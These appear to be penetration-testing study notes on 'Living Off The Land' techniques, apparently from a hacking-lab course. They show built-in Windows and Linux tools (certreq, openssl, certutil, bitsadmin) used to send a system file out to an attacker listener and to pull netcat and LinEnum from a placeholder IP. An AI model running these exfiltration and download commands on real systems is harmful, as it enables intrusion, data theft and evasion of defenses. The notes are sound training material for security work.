Living Off The Land - using the legitimate, system-present tools to masquerade the following as a regular activity:

  • Download

  • Upload

  • Command Execution

  • File Read

  • File Write

  • Bypasses

  • Privilege escalation

  • LOLBAS

    • documents every binary, script and library that can be used for Living Off The Land techniques in Windows
    • filters: /upload, /download etc.

  • GTFOBins

    • same but for Linux
    • filters: +file download etc.

CertReq.exe#

certreq.exe -Post -config http://IP:8000/ c:\windows\win.ini
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)

sudo nc -lvnp 8000

listening on [any] 8000 ...
connect to [IP] from (UNKNOWN) [IP_2] 53819
POST / HTTP/1.1
# ...
Host: IP:8000

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

openssl#

# Kali
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Generating a RSA private key
#...
writing new private key to 'key.pem'
#...
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

File transfer

# Kali
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

# Victim
openssl s_client -connect IP:80 -quiet > LinEnum.sh

certutil.exe#

# download a file
certutil.exe -verifyctl -split -f http://IP:8000/nc.exe

bitsadmin.exe#

Background Intelligent Transfer Service allows to download files from HTTP/SMB.

bitsadmin /transfer wcb /priority foreground http://IP:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

This can be used also as a PowerShell module:

Import-Module bitstransfer; Start-BitsTransfer -Source "http://IP:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"